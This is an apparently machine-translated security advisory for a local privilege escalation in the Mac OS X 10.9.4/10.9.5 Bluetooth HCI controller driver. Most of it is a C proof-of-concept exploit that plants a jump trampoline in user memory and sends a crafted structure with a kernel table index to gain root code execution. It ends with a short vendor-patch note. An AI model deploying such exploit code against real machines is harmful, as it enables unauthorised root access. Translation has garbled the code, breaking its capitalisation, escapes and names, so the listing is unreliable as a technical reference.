Apple Mac OS X ioblustmthhcicontroller Local Privilege Escalation Vulnerability

Apple Mac OS X ioblustmthhcicontroller Local Privilege Escalation Vulnerability

Release date:
Updated on:

Affected Systems:
Apple Mac OS X 10.9.5
Apple Mac OS X 10.9.4
Description:
Bugtraq id: 70894

OS x (formerly Mac OS X) is the latest version of Apple's exclusive operating system developed for Mac tower computers.

The ioblustmthhcicontroller Implementation of Apple Mac OS X 10.9.4 and 10.9.5 has a local permission Escalation Vulnerability. Local attackers can exploit this vulnerability to execute arbitrary code with root permissions.

<* Source: Robert Paleari (roberto.paleari@emaze.net)
Aristide Fattori
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/*
* Pwn. c, by @ rpaleari and @ joystick
*
* This PoC exploits a missing sign check in
* Iobluw.thhciuserclient: SimpleDispatchWL ().
*
* Tested on Mac OS X Mavericks (10.9.4/10.9.5 ).
*
* Compile with: gcc-Wall-o pwn {,. c}-framework IOKit
*
*/

# Include <stdio. h>
# Include <string. h>
# Include <mach/mach. h>
# Include <mach/vm_map.h>

# Include <IOKit/IOKitLib. h>

Uint64_t payload (){
/* Your payload goes here .*/
}

Int main (void ){
/* Map our landing page (kernel will jump at tgt + 7 )*/
Vm_address_t tgt = 0x0000048800000000;
Vm_allocate (mach_task_self (), & tgt, 0x1000, 0 );
Vm_protect (mach_task_self (), tgt, 0x1000, 0,
VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE );
Memset (void *) tgt, 0, 0x1000 );

/* Prepare payload */
Char * target = (char *) tgt;

/* Mov rax, payload */
Target [7] = 0x48;
Target [8] = 0xb8;
* (Uint64_t *) (& target [9]) = (uint64_t) payload;

/* Jmp rax */
Target [17] = 0xff;
Target [18] = 0xe0;

Printf ("[+] Payload function @ % 016llx \ n", (uint64_t) payload );
Printf ("[+] Stored trampoline @ % 016llx \ n", (uint64_t) tgt + 7 );

/* Find the vulnerable service */
Io_service_t service =
IOServiceGetMatchingService (kIOMasterPortDefault,
IOServiceMatching ("iobluw.thhcicontroller "));

If (! Service ){
Return-1;
}

/* Connect to the vulnerable service */
Io_connect_t port = (io_connect_t) 0;
Kern_return_t kr = IOServiceOpen (service, mach_task_self (), 0, & port );
IOObjectRelease (service );
If (kr! = KIOReturnSuccess ){
Return kr;
}

Printf ("[+] Opened connection to service on port: % d \ n", port );

/* The first 8 bytes must be 0, so we don't have to handle following
Parameters */
Char a [] = "\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00"
/* Don't really matter for the exploit (ignored due to the 0 s above )*/
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x07 \ x02 \ x00 \ x00 \ x00 \ x11 \ x0a \ x00 \ x00 \ x03 \ x72 \ x00 \ x00"
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00"
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ xe8 \ xfa \ x2a \ x54 \ xff \ x7f \ x00 \ x00 \ x78 \ x00 \ x00 \ x00 \ x00"
"\ X00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00"
"\ Xa8 \ xfb \ x2a \ x54 \ xff \ x7f \ x00 \ x00 \ xd8 \ xfa \ x2a \ x54 \ xff \ x7f \ x00 \ x00 \ x60 \ x4a \ xb6 \ x86"
"\ X80 \ xff"
/* Index value 0xfff5b6a8 makes _ sRoutines [index] point to an in-kernel
Memory area that contains {0x0000048800000007, N}, with 0 <= N <8. May
Need to be adjusted on other Mavericks versions .*/
"\ Xa8 \ xb6 \ xf5 \ xff \ x80 \ xff ";

Printf ("[+] Launching exploit! \ N ");
Kr = IOConnectCallMethod (mach_port_t) port,/* Connection */
(Uint32_t) 0,/* Selector */
NULL, 0,/* input, inputCnt */
(Const void *) a,/* inputStruct */
Sizeof (a),/* inputStructCnt */
NULL, NULL);/* Output stuff */

/* Exec shell here after payload returns */

Return IOServiceClose (port );
}

Suggestion:
Vendor patch:

Apple
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.apple.com/support/downloads/

OS X details: click here

This article permanently updates the link address: